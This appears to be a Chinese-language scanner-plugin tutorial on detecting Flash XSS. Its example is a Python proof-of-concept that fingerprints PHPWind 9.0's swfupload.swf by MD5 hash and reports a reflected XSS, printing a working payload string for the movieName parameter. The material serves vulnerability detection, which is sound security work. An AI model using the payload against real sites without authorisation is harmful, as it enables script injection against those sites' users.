• Flash XSS
    • 实例:

    Flash XSS


    这一类的 XSS 主要是由于 Flash 与 Js 交互过程中产生的 XSS。

    检测方法:校验 flash 的 hash 值(例如: md5)

    实例:

    phpwind 9.0 /res/js/dev/util_libs/swfupload/Flash/swfupload.swf XSS漏洞

    由于 Flash 文件是可以下载到客户端,所以直接下载该 swf 文件,校验其 hash。根据漏洞详情,可知该 swf 文件路径为: /res/js/dev/util_libs/swfupload/Flash/swfupload.swf

    范例插件

    PHPWind 9.0 swfupload.swf Flash XSS

    感谢插件作者: xyw55

    1. #!/usr/bin/env python
    2. # coding:utf-8
    3. # @Date : 2015-06-28
    4. # @Author : xyw55 (xyw5255@163.com)
    5. '''
    6. phpwind 9.0 /res/js/dev/util_libs/swfupload/Flash/swfupload.swf xss漏洞 POC
    7. refer : http://wooyun.org/bugs/wooyun-2013-017731
    8. '''
    9. import md5
    10. def assign(service, arg):
    11. if service == fingerprint.phpwind:
    12. return True, arg
    13. def audit(arg):
    14. flash_md5 = "3a1c6cc728dddc258091a601f28a9c12"
    15. file_path = "/res/js/dev/util_libs/swfupload/Flash/swfupload.swf"
    16. url = arg
    17. verify_url = url + file_path
    18. code, head, res, redirect_url, log = hackhttp.http(verify_url)
    19. if code == 200:
    20. md5_value = md5.new(res).hexdigest()
    21. if md5_value in flash_md5:
    22. # info 中不要传 log
    23. security_info(url + ' phpwind Reflected XSS; plaload: /res/js/dev/util_libs/swfupload/Flash/swfupload.swf?movieName="])}catch(e){alert(1)}//')
    24. if __name__ == '__main__':
    25. from dummy import *
    26. audit(assign(fingerprint.phpwind, 'http://www.example.com/')[1])